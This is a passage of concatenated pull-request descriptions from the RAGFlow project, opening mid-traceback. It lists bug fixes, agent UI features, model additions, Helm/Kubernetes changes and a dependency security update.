await do_handle_task(task)
File "/ragflow/rag/svr/task_executor.py", line 553, in do_handle_task
chunks = await build_chunks(task, progress_callback)
File "/ragflow/rag/svr/task_executor.py", line 257, in build_chunks
cks = await trio.to_thread.run_sync(lambda: chunker.chunk(task["name"], binary=binary, from_page=task["from_page"],
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 447, in to_thread_run_sync
return msg_from_thread.unwrap()
File "/ragflow/.venv/lib/python3.10/site-packages/outcome/_impl.py", line 213, in unwrap
raise captured_error
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 373, in do_release_then_return_result
return result.unwrap()
File "/ragflow/.venv/lib/python3.10/site-packages/outcome/_impl.py", line 213, in unwrap
raise captured_error
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 392, in worker_fn
ret = context.run(sync_fn, *args)
File "/ragflow/rag/svr/task_executor.py", line 257, in <lambda>
cks = await trio.to_thread.run_sync(lambda: chunker.chunk(task["name"], binary=binary, from_page=task["from_page"],
File "/ragflow/rag/app/naive.py", line 384, in chunk
sections, tables = Docx()(filename, binary)
File "/ragflow/rag/app/naive.py", line 230, in __call__
while i < len(r.cells):
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 438, in cells
return tuple(_iter_row_cells())
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 436, in _iter_row_cells
yield from iter_tc_cells(tc)
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 424, in iter_tc_cells
yield from iter_tc_cells(tc._tc_above) # pyright: ignore[reportPrivateUsage]
File "/ragflow/.venv/lib/python3.10/site-packages/docx/oxml/table.py", line 741, in _tc_above
return self._tr_above.tc_at_grid_offset(self.grid_offset)
File "/ragflow/.venv/lib/python3.10/site-packages/docx/oxml/table.py", line 98, in tc_at_grid_offset
raise ValueError(f"no `tc` element at grid_offset={grid_offset}")
ValueError: no `tc` element at grid_offset=10
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix "broken data stream when writing image file", just log warning and
ignore
Close#8379
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes the issue in the analyze_task execution flow where the Lead Agent
was not utilizing its own sys_prompt during task analysis, resulting in
incorrect or incomplete task planning.
https://github.com/infiniflow/ragflow/issues/9294
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- The enum import was changed from Python's built-in StrEnum to the
strenum package.
- Fix error `Warning: Failed to import module code_exec: cannot import
name 'StrEnum' from 'enum' (/usr/lib/python3.10/enum.py)`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Run eslint when the project is running to standardize everyone's
code #9377
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
add ru
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Feat: Modify the agent list return field name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: New search page components and features #3221
- Added search homepage, search settings, and ongoing search components
- Implemented features such as search app list, creating search apps,
and deleting search apps
- Optimized the multi-select component, adding disabled state and suffix
display
- Adjusted navigation hooks to support search page navigation
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.0 to v0.20.1
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Revert token_required decorator of agent_bot completions and inputs.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
feat(agent): Adds prologue functionality #3221
- Add a prologue field to the IInputs type
- Initialize the prologue state in the chat container
- Use useEffect to monitor prologue changes and add prologue responses
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
new Agent templates: you can choose your knowledge base, providing
workflow and Agent versions
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Set the description of the agent, which can be null #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render agent setting dialog #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update broken agent completion due to v0.20.0 changes. #9199
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Contribute a new workflow template: SQL Assistant
### Type of change
- [x] Other (please describe): new workflow template
### What problem does this PR solve?
Feat: Restore the button's background color #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Replace color variables according to design draft #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Configure colors according to the design draft#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix virtual file cannot be displayed in KB. #9265
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix: Optimized popups and the search page #3221
- Added a new PortalModal component
- Refactored the Modal component, adding show and hide methods to
support popups
- Updated the search page, adding a new query function and optimizing
the search card style
- Localized, added search-related translations
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add missing env var `MYSQL_MAX_PACKET` to service_conf.yaml.template,
and add default values to opendal config to fix npe.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Updated constructors for base and derived classes in chat, embedding,
rerank, sequence2txt, and tts models to accept **kwargs. This change
improves extensibility and allows passing additional parameters without
breaking existing interfaces.
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: IT: Sop.Son <sop.son@feavn.local>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
### What problem does this PR solve?
Feat: Search conversation by name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Create a conversation #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Improve the logic so that it does not decode base 64 for the test image
each time
### Type of change
- [x] Refactoring
- [x] Performance Improvement
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add Claude Opus 4.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
FIX: If chunk["content_with_weight"] contains one or more unpaired
surrogate characters (such as incomplete emoji or other special
characters), then calling .encode("utf-8") directly will raise a
UnicodeEncodeError.
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
feat(agent): Added history management and paste handling features #3221
- Added a PasteHandlerPlugin to handle paste operations, optimizing the
multi-line text pasting experience
- Implemented the AgentHistoryManager class to manage history,
supporting undo and redo functionality
- Integrates history management functionality into the Agent component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Implemented French UI translation
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: ramin cedric <>
Co-authored-by: Liu An <asiro@qq.com>
### What problem does this PR solve?
Update readme
### Type of change
- [x] Documentation Update
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Feat: Limit the appearance of loops in operators in the agent canvas
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
tiny fix about the using of `deepdoc.pdf_parser.PlainParser` in
`rag.app.presentation.chunk`, I referred to other ways of using this
class.
So tiny the fix is, a issue seems unnecessary.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Render dialog list #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#9232
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
1. When creating a new session, initialize an empty reference that
includes both the app api and sdk API.
2. Fix the logic when retrieving references for historical messages: the
number of dialogue messages and reference messages may differ, but it
should match the number of assistant messages.
Co-authored-by: Li Ye <liye@unittec.com>
### What problem does this PR solve?
Fix: Fixed the issue where numbers could not be displayed in the numeric
input box under white theme #3221
Fix: Set the maximum number of rounds for the agent to 1 #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This commit refactors the core prompts to decouple the high-level
reasoning from the low-level information extraction. By making
REASON_PROMPT a dedicated strategist that only generates search queries
and re-tasking RELEVANT_EXTRACTION_PROMPT to be a specialized tool for
single-fact extraction, we eliminate redundant information
summarization. This clear separation of concerns makes the overall
reasoning process significantly faster and more precise, as each
component now has a single, well-defined responsibility.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Fix: Add prompt text to the form in the MCP module #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the agent's chat box could not automatically
scroll to the bottom #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the loss of Await Response function on the share page and
other style issues #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the prompt word edit box had no scroll bar
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
list_document supports range filtering.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
**Context and Purpose:**
This PR automatically remediates a security vulnerability:
- **Description:** h11: h11 accepts some malformed Chunked-Encoding
bodies
- **Rule ID:** CVE-2025-43859
- **Severity:** CRITICAL
- **File:** uv.lock
- **Lines Affected:** None - None
This change is necessary to protect the application from potential
security risks associated with this vulnerability.
**Solution Implemented:**
The automated remediation process has applied the necessary changes to
the affected code in `uv.lock` to resolve the identified issue.
Please review the changes to ensure they are correct and integrate as
expected.
### What problem does this PR solve?
Feat: New Agent startup parameters add knowledge base parameter #9194
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix "out of memory" if slide.get_thumbnail() to a huge image
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
…eType'"
### What problem does this PR solve?
fix "TypeError: '<' not supported between instances of 'Emu' and
'NoneType'"
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix#8424 NPE in dify_retrieval.py, add log exception
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix:
```bash
'Langfuse' object has no attribute 'trace'
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/9177
The reason should be due to the gemin internal use a different parameter
name
`
max_output_tokens (int):
Optional. The maximum number of tokens to include in a
response candidate.
Note: The default value varies by model, see the
``Model.output_token_limit`` attribute of the ``Model``
returned from the ``getModel`` function.
This field is a member of `oneof`_ ``_max_output_tokens``.
`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The index name of the tag chunks is generated by the tenant id of the
knowledge base, so it should use the tenant id instead of the current
user id in the listing tags API.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR adds a data backup and migration solution for RAGFlow Docker
Compose deployments. Currently, users lack a standardized way to backup
and restore RAGFlow data volumes (MySQL, MinIO, Redis, Elasticsearch),
which is essential for data safety and environment migration.
**Solution:**
- **Migration Script** (`docker/migration.sh`) - Automates
backup/restore operations for all RAGFlow data volumes
- **Documentation**
(`docs/guides/migration/migrate_from_docker_compose.md`) - Usage guide
and best practices
- **Safety Features** - Container conflict detection and user
confirmations to prevent data loss
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
Co-authored-by: treedy <treedy2022@icloud.com>
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.19.1 to v0.20.0
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Adjust the style of the note node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed share-log UI issues and log-template bugs #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the style of the agent page bright theme #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add industry-related search keyword generation function
- When generating search keywords, support for specific industries has
been added
- If the "industry" parameter is provided, industry-specific
restrictions will be added to the prompt
- This change can help users generate more precise search keywords
within specific industries
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add a series of qwen3 latest SOTA models:
qwen3-coder-480b-a35b-instruct, qwen3-30b-a3b-instruct-2507,
qwen3-30b-a3b-thinking-2507, qwen3-235b-a22b-instruct-2507,
qwen3-235b-a22b-thinking-2507
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Remove the exception comment field from the agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix kimi-latest is not authorized.
Add kimi-thinking-preview.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
```bash
Traceback (most recent call last):
File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 635, in update_progress
info["progress_msg"] = "%d tasks are ahead in the queue..."%get_queue_length(priority)
File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 686, in get_queue_length
return int(group_info.get("lag", 0))
TypeError: int() argument must be a string, a bytes-like object or a real number, not 'NoneType'
```
This issue can happen very rare. When a `stream` is first created, the
`lag` value may be nil, which can cause this issue. However, once any
message is synced, the `lag` will become `0` afterwards.
```bash
> XINFO GROUPS rag_flow_svr_queue
1) 1) "name"
2) "rag_flow_svr_task_broker"
3) "consumers"
4) (integer) 0
5) "pending"
6) (integer) 0
7) "last-delivered-id"
8) "1753952489937-0"
9) "entries-read"
10) (nil)
11) "lag"
12) (nil)
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete the operator node and hide the corresponding sheet #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display operator icons on the agent form #3221
Fix: Fixed the issue where the form corresponding to the tool operator
icon could not appear after clicking it #3211
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Improve Agent templates functionality and fix some UI style issues
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the tool operator icon #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
add Kimi-K2-Instruct from Tongyi-Qianwen API
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Automatically save agent canvas content
Feat: Replace the link of the old version of the agent module #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add Generator return type annotation for tts method
- Import typing.Generator for type hints
### Type of change
- [x] Refactoring
### What problem does this PR solve?
This code allows user chat to auto-scroll down when entered, but if user
scrolls up away from the generative feedback, autoscroll is disabled.
Close#9062
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Charles Copley <ccopley@ancera.com>
### What problem does this PR solve?
Feat: Make the agent dialog window exposed to the outside world fill in
the begin form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#9082#6365
<u> **WARNING: it's not compatible with the older version of `Agent`
module, which means that `Agent` from older versions can not work
anymore.**</u>
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Handling abnormal anchor points of agent operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add log-detail page,Improve the style of chat boxes #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Translate operator names and allow mailboxes to reference operator
names #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Replace the placeholder test image in base64_image.py with a new sample
image data string.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Add wencai operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
doc_ids is a list , should use request.args.getlist("doc_ids")
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add invoke and github operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix error 429 api rate limit when building knowledge graph for all chat
model and Mistral embedding model.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Fix incomplete curl command in section 5 'Tool calling', add missing
closing braces and parentheses to complete the JSON payload
This resolves the incomplete bash script that was missing proper JSON
structure closure.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Add agent-log-list page And RAPTOR:Save directly after enabling,
incomplete form submission #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Supports jsonl or ldjson format. Feature request from
[discussion](https://github.com/orgs/infiniflow/discussions/8774).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enable MCP streamable-http model via docker compose
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Arxiv GoogleScholar operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Email and DuckDuckGo and Wikipedia Operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add documentation for MCP streamable-http transport.
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Feat: Add Yahoo Finance Operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Google operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the uploaded agent message file #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The operator is displayed only when the number of conditions is
greater than 1 #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Click the edit tool button of the agent form to open the
corresponding form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add agent log-sheet in cavas and log-sheet in share's page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the condition of deleting the classification
operator cannot be connected anymore #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Mac OS build fails on M4. Docker compose requires platform to be
specified to build correctly
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Charles Copley <ccopley@ancera.com>
### What problem does this PR solve?
Feat: Filter the agent form's large model list by type #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Keep the workflow page link unchanged #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update BaseModel to use model_config instead of Config class
- Replace StrEnum with Literal types for method fields
- Convert Field declarations to Annotated style
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Add parsing animations to the agent log and optimize some page styles
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix a small non-blocking main workflow bug about chunk update When
OpenSearch is the doc engine.
When you wanna enable/disable a chunk in the web-page “Knowledge Base /
Dataset / Chunk”, the bug ocurred.
<img width="2388" height="662" alt="image"
src="https://github.com/user-attachments/assets/575987a0-c929-4589-bfa0-ba54e137cfd9"
/>
The reaseon why it ocurred is that some api params between OpenSearch
and ES differs. It functioned well no matter enable/disable/rewrite the
chunk after I fixed. I also checked the result when using the chat
web-page.
<img width="2394" height="660" alt="image"
src="https://github.com/user-attachments/assets/8b899dc6-d769-4e80-8dd8-ad0fbbca5f78"
/>
I will still focus on vector-database espeically OpenSearch.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: 张雨豪 <zhangyh80@chinatelecom.cn>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Downstream operators can get the variables defined by the user
input operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Upload files in the chat box on the agent page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allows users to delete a condition of a conditional operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix issue with `keep_alive=-1` for ollama chat model by allowing a user
to set an additional configuration option. It is no-breaking change
because it still uses a previous default value such as: `keep_alive=-1`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [X] Performance Improvement
- [X] Other (please describe):
- Additional configuration option has been added to control behavior of
RAGFlow while working with ollama LLM
### What problem does this PR solve?
Feat: Modify the background color of the agent canvas #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Obfuscates additional secrets values on ragflow_server startup to
prevent leakage:
* `secret` (azure)
* `client_secret` (oauth)
* `http_secret_key` (authentication)
* `sas_token` (azure)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Gifford R Nowland <gifford.r.nowland@aero.org>
### What problem does this PR solve?
Previous version created labels which were dependent on the specific
Helm chart version such as:
```
volumeClaimTemplates:
- metadata:
name: redis-data
labels:
helm.sh/chart: ragflow-0.2.3-dev.0.opensearch-test.4
app.kubernetes.io/name: ragflow
app.kubernetes.io/instance: test-1
app.kubernetes.io/version: "9a04408"
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/component: redis
```
which causes `helm upgrade` commands to fail with
```
Upgrade "test-1" failed: cannot patch "test-1-ragflow-redis" with
kind StatefulSet: StatefulSet.apps "test-1-ragflow-redis" is
invalid: spec: Forbidden: updates to statefulset spec for fields
other than 'replicas', 'ordinals', 'template', 'updateStrategy',
'persistentVolumeClaimRetentionPolicy' and 'minReadySeconds' are
forbidden
```
because the labels changed on upgrade.
This fix uses a reduced set of labels to prevent upgrade failures.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix Kubernetes liveness probe on the OpenSearch container. The previous
HTTP probe received an 401 response from the OpenSearch API which
treated as a failure and caused the container to be restarted every 20
minutes.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Replace Avatar with RAGFlowAvatar component for knowledge base and
agent, optimize Agent template page, and modify bugs in knowledge base
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Bump to infinity v0.6.0-dev4.
WARNNING: infinity v0.6.0-dev4 has very different meta data format with
older versions. You have to destroy infinity data volume are restart
infinity container if there's existing data.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add model provider DeepInfra. This model list comes from our community.
NOTE: most endpoints haven't been tested, but they should work as OpenAI
does.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Share agent dialog box externally #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
OpenAI-compatible-API supports references.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where the error prompt box on the Agent page would
be covered #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Extended embedding model timeout from 3 to 10 seconds in api_utils.py
- Added more time for large file batches and concurrent parsing
operations to prevent test flakiness
- Import from #8940
- https://github.com/infiniflow/ragflow/actions/runs/16422052652
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
PR #8665 updated chrome and chromedriver sources, removing the appended
version number. This PR resolves filename inconsistencies that would
cause `Dockerfile.deps` to fail to build when ommiting `--china-mirrors`
when running `uv run download_deps.py`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Switch to Kubernetes StatefulSet resources for MySQL, Minio and vector
DB since these are stateful application components. This makes
operations such as helm upgrade smoother since the default container
update strategy becomes a sequential rolling update of each pod.
Also fixes a bug in the name template for the Minio stateful set
resource to align it with the naming convention used for other
components.
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Adds configurations for gemini-2.5-flash and Gemini 2.5-pro models,
including tags, maximum token limits, and model types.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Use `quote_plus` to escape password in opendal's mysql url to support
special characters like `#`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Update `get_parser_config` to merge provided configs with defaults
- Add GraphRAG configuration defaults for all chunk methods
- Make raptor and graphrag fields non-nullable in ParserConfig schema
- Update related test cases to reflect config changes
- Ensure backward compatibility while adding new GraphRAG support
- #8396
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Improve usability of Node.js/JavaScript code executor.
### Type of change
- [x] Refactoring
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Correct cancel logic error
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Feat: Adjust the page header to breadcrumbs #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add the option to use the knowledge graph to the retrieval form
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the key parameter duplication check of the
begin operator was incorrect #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue of clicking to run the agent causing an error #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Generate avatar; Add knowledge graph; Modify the style of the
multi-select component
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue that variables defined in the begin operator cannot
be referenced in the switch operator. #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display agent version in pages #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display agent history versions #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the style of the agent canvas connection line #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Adds OpenSearch support to the RAGFlow Helm chart based on
https://github.com/infiniflow/ragflow/pull/7140 and the existing
Elasticsearch support in the Helm chart.
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
…be seen when selecting the next operator #3221
### What problem does this PR solve?
Fix: Fixed the issue that the content of the Dropdown section cannot be
seen when selecting the next operator #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the EmbedDialog style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Show agent embed dialog #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add TavilyExtract operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the knowledge graph could not be displayed
#8890
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix the problem that the custom footer of modal component is not
effective, specify the react and react-dom versions, and add the
input-number component
[#3221](https://github.com/infiniflow/ragflow/issues/3221)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix opensearch OSConnection init.
```
docStoreConn = rag.utils.opensearch_conn.OSConnection()
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
when``` if 'signature_version' in self.s3_config:``` and ```if
'addressing_style' in self.s3_config:``` both true.
the config init is error, will be overwrite by last one.
this pr is for fix that case.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: zhanluxianshen <zhanluxianshen@163.com>
### What problem does this PR solve?
Feat: Display the thinking process according to the start_to_think flag
of the message #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix: modify the connection ports of minio and redis in
service_conf.yaml.template
### What problem does this PR solve?
If you modify the external ports of minio and redis in the .env file, it
will also affect the connection ports inside the container in the
service_conf.yaml.template file, which is unreasonable.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Correct the logging message from "OpenAI cat_with_tools" to "OpenAI
chat_with_tools" in the `_exceptions` method of the `Base` class to
accurately reflect the method name and improve error traceability.
### Type of change
- [x] Typo
### What problem does this PR solve?
Add Kimi model series support.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixed graphknowledge Tree structure not found for treeKey.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Type of change
